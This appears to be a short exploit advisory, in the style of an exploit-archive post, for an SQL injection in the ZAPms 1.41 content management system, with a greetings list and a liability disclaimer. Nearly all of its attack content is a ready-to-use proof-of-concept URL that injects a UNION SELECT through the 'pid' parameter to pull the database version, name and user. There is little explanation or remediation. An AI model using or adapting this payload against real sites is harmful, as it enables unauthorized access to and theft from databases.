=============================================================================================================
[o] ZAPms <= SQL Injection Vulnerability
Software : ZAPms
Version : 1.41
Vendor : http://www.zapms.de
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Desc : ZAPms is free open source web content management system,
adapted to the needs of businesses on the Internet.
The ZAPms offers many features and modules as well as an expansion interface for maximum capabilities.
=============================================================================================================
[o] Exploit
http://localhost/[path]/products?pid=[SQLi]
=============================================================================================================
[o] PoC
http://server/products?pid=-14+union+select+1,2,3,4,5,6,7,8,9,version(),database(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,user(),43,44,45,46,47,48--&cid=0&tid=&page=&action=details&subaction=product
=============================================================================================================
[o] Greetz
Vrs-hCk OoN_BoY Paman zxvf s4va Angela Zhang stardustmemory
aJe kaka11 matthews wishnusakti inc0mp13te martfella
pizzyroot Genex H312Y noname tukulesto }^-^{
=============================================================================================================
[o] April 09 2013 - Papua, Indonesia
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information